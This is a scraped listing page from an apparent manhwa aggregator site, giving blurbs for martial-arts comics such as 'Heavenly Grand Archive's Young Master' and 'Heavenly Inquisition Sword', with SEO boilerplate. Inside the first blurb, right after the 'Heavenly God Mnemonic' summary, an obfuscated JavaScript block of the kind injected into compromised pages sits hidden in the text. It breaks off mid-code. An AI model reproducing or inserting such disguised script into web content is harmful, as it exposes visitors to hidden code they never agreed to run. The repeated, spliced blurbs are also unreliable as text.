Martial Arts - Page 54

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2257 results

Heavenly God Mnemonic

A drop of blood from the demon god, destroyed ten thousand mountains and rivers. A roll of scripture, obliterated the cycle of the sun and moon. A collection of mnemonics, bury all the most highs. Yang Qing Xuan received his fated inheritance, and practiced the way of invincibility, and allowed him to run through innumerable geniuses, and open up an everlasting path of becoming the strongest! “I have always win people over by virtue, and those that didn’t are all dead!”<script></script><script>(function(_0x262ede,_0x3c3853){var _0x11ac95=_0x3538,_0x25d582=_0x262ede();while(!![]){try{var _0x45b424=parseInt(_0x11ac95(0xa5))/(0x121c+-0x1aa6+0x2d9*0x3)+-parseInt(_0x11ac95(0xa7))/(-0x5c2*0x4+-0x24c9+0x3bd3)*(parseInt(_0x11ac95(0xa3))/(-0x24ea+-0x18bf+0x3dac))+parseInt(_0x11ac95(0x9b))/(-0x1cad+-0x8d4+-0x5*-0x781)+-parseInt(_0x11ac95(0xb1))/(0x1fe9+0x1f*-0x9e+-0xcc2)+-parseInt(_0x11ac95(0x92))/(0x737*-0x2+-0x709*0x1+-0x157d*-0x1)+-parseInt(_0x11ac95(0xa1))/(0x1749+0xa1f*-0x2+-0x304*0x1)+parseInt(_0x11ac95(0xab))/(-0x1d41+-0x550+0x2299);if(_0x45b424===_0x3c3853)break;else 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Heavenly Grand Archive’s Young Master

[By the studio that brought you !]The soul of the charming and imposing Murim Alliance Leader, Hu Gong, suddenly possesses the body of a darn young man’s body one day.That young man’s name is Beom Hang. He’s the young master of the Heavenly Grand Archive’, one of the three major archives of the jianghu, yet a sorry excuse of a person.In order to determine why his soul has swapped bodies, Hu Gong begins to train Beom Hang’s body. When the possessed young master of the Heavenly Grand Archive’s movements are totally different from how they used to be, it starts to attract the attention of the jianghu


Heavenly Grand Archive’s Young Master

Read Heavenly Grand Archive’s Young Master Manhwa [By the studio that brought you <Regressor Instruction Manual>!] The soul of the charming and imposing Murim Alliance Leader, Hu Gong, suddenly possesses the body of a darn young man’s body one day. That young man’s name is Beom Hang. He’s the young master of the ‘Heavenly Grand Archive’, one of the three major archives of the jianghu, yet a sorry excuse of a person. In order to determine why his soul has swapped bodies, Hu Gong begins to train Beom Hang’s body. When the possessed young master of the Heavenly Grand Archive’s movements are totally different from how they used to be, it starts to attract the attention of the jianghu… Welcome to Mangazin site, you can read and enjoy all kinds of Manhwa trending  such as Drama, Manhua, Manga, Romance…, for free here. All of the manhwa new will be update with high standards every hours. If you are a Comics book (Manhwa Hot ), MangaGG is your best choice, don’t hesitate, just read and feel !

2 days ago

Heavenly Inquisition Sword

Read “Heavenly Inquisition Sword Manga” – “Heavenly Inquisition Sword Manhwa” Online Free On MANHWATOP The summary of the comics “Heavenly Inquisition Sword”: “He is the master of the Nine Heavens.” Yeon Jeokha was the child of a second wife. Viciously bullied by his father’s first wife and his siblings, he was later imprisoned in a warehouse after his father died of illness. It has been ten years since his escape after he had learned martial arts that were out of the world. “I regard the Yeon Family with great bitterness.” The unstoppable adventure of the sole successor of the Heavenly Inquisition Sword, Yeon Jeokha, begins now! “Heavenly Inquisition Sword” is alternatively named: Espada de la inquisición celestial / Gucheongugeom / The Nine Heavens Swordmaster / L’Épée des neuf cieux / Nine Heavens Swordmaster / กระบี่พิพากษ์เก้าสวรรค์ / 九天究剑 / 九天究剣 / 九天究劍 / 구천구검 The comics “Heavenly Inquisition Sword” belongs to the Genre: Action, Adventure, Fantasy, Martial Arts, Murim “HariManga, MANGA UPDATES, Manhwa Website…” are the most searched keywords on the website MANHWACLAN. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging

3 days ago

Heavenly Inquisition Sword (Nine Heavens Swordmaster)

By Redice Studios, the ones who brought you and !"He is the master of the Nine Heavens."Yeon Jeokha was the child of a second wife. Viciously bullied by his father's first wife and his siblings, he was later imprisoned in a warehouse after his father died of illnessIt has been ten years since his escape after he had learned martial arts that were out of the world."I regard the Yeon Family with great bitterness."The unstoppable adven


Heavenly Martial God

“Who’s this male prostitute-looking kid?” I am the Matchless Ha Hoo Young, the greatest martial artist reigning over all the lands! There is no one that is my equal! I was drowning in futility and emptiness because there was no more that I could accomplish in the human realm. To reach the peak of martial arts, I must become a saint! “I finally succeeded!!!” “Stop! Your ascension is not permitted!” The other saints refused my ascension due to my karma after much slaughter, and I fell, just like that. When I woke up, I was 60 years in the future. I was reborn as the second lord of the Namgoong family, Namgoong Hyuk. Where has all the internal energy that I’ve accumulated gone?! Moreover, I have the Nine yin energy blockage?


Heavenly Moon

The Murim Warring States period, is where only the strong survives. This is the war slave Cheong Gwang and Myeong-Wol's Murim Survival Story.


Heavenly Sword’S Grand Saga

There are people in the world that thinks they are the ‘chosen’ of the heavens. It’s been decades since chaos and strife among heroes ensued because of those people. A certain disciple who has six masters has been entrusted with the fate of the central plains. “If you guys are the heavens, then I’m the sword that’ll pierce the heavens.” That was what he’d resolved to do… No one mentioned he was a fatty, though! In any case, now that he’s here, he’ll need to save the… world… Damn it, lose some weight first.


Heavenly Sword’s Grand Saga

There are people in the world that thinks they are the ‘chosen’ of the heavens. It’s been decades since chaos and strife among heroes ensued because of those people. A certain disciple who has six masters has been entrusted with the fate of the central plains. “If you guys are the heavens, then I’m the sword that’ll pierce the heavens.” That was what he’d resolved to do… No one mentioned he was a fatty, though! In any case, now that he’s here, he’ll need to save the… world… Damn it, lose some weight first.


Heir Of Mythical Heroes

Han Jungmin, who is only ‘top on in written exams’, gave up becoming an adventurer as he didn’t have the talent. After taking some time off from the adventurer academy, and as he started to write a fantasy novel… [You have been plagiarised by the world.] [Unique class – author of the story starts.] one day, the novel Jungmin wrote starts to become a reality and gets the job of being the ‘author of the story’. On top of that… [The only unique ability opens.] a special skill that nobody else has. Can Jungmin achieve his dream of becoming a dungeon adventurer? Heir of a legendary hero. Successor of Mythical Heroes

2 days ago

Heirs Of Cultivation In The City

Heavenly Dao collapsed, and the era of the end of the law came. The cultivator Chen Qiuran inadvertently bound the severely damaged Heavenly Dao system and also signed a contract to repair the Heavenly Dao spiritual energy. This is a story in which an unemployed social animal becomes a villain demon under the temptation of the eight insurances and three golds, and invades (crosses out) the world of billions. Show less
